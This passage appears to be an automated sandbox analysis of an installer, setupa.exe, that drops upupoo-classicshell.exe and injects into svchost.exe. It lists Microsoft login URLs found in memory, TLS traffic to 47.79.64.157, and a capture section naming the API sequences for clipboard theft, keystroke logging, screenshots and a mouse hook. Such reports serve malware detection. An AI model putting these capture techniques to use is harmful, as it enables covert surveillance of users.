Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601Up
Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfuthUp
Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfesign
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfnect
Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfp
Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 00000008.00000003.2199716927.000002D75456B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfttps://lo
Source: svchost.exe, 00000008.00000003.2199716927.000002D75456B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 00000008.00000002.3346905537.000002D753E81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DrEXEOwtzY8Qck
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfp
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600gi
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 00000008.00000003.2199716927.000002D75456B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3351923495.000002D754C49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfls01
Source: svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199640134.000002D754557000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199418919.000002D75455A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2297410444.000002D754C60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfAuth
Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/resetpw.srfe
Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 00000008.00000002.3347561390.000002D753EB9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3351923495.000002D754C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://signup.live.com/signup.aspx
Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DFE8A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052BE8A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DFE8A0 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DFBCC0 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DFE540 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState
Source: C:\Windows\SysWOW64\svchost.exe | Windows user hook set: 0 mouse low level C:\Windows\System32\DINPUT8.dll
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689643D78 NtQueryInformationProcess,RtlNtStatusToDosError
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E094DD0 NtUnloadDllMemoryAndExitThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DFB48F ExitWindowsEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DFB4B3 ExitWindowsEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DFB46B ExitWindowsEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052BB46B ExitWindowsEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052BB4B3 ExitWindowsEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052BB48F ExitWindowsEx
Source: C:\Windows\System32\lsass.exe | File created: C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\c2786235-70ab-4cdc-b58e-997eca54c008
